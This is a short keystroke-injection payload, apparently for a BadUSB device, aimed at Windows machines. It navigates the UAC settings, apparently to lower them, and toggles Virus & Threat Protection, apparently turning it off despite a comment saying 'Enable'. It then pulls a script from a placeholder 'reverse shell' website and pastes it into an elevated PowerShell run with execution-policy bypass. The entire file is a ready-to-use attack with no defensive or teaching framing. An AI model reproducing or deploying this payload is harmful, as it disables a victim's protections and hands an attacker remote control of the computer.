
CONTROL ESCAPE
DELAY 600
STRING uac
DELAY 500
ENTER
DELAY 300
DOWNARROW
DELAY 400
DOWNARROW
DELAY 300
DOWNARROW
DELAY 400
TAB
DELAY 300
ENTER
DELAY 400
LEFT
DELAY 300
ENTER
DELAY 600
ALT F4
DELAY 400

REM Enable Virus & Threat Protection
CONTROL ESCAPE
DELAY 600
STRING virus protection
DELAY 400
ENTER
DELAY 1900
TAB
DELAY 300
TAB
DELAY 300
TAB
DELAY 300
TAB
DELAY 600
ENTER
DELAY 600
SPACE
DELAY 901
ALT F4

GUI m
DELAY 700
GUI r
DELAY 700
STRING (YOUR REVERSE SHELL SCRIPT WEBSITE HERE)
DELAY 50
ENTER
DELAY 500
CTRL A
DELAY 500
CTRL C
DELAY 800
CTRL W
DELAY 500
GUI r
DELAY 200
STRING powershell -NoP -NonI -Exec Bypass
DELAY 100
CTRL SHIFT ENTER
DELAY 300
LEFTARROW
DELAY 100
ENTER
DELAY 400
CTRL V
DELAY 400
ENTER
DELAY 100
STRING exit
DELAY 50

ENTER
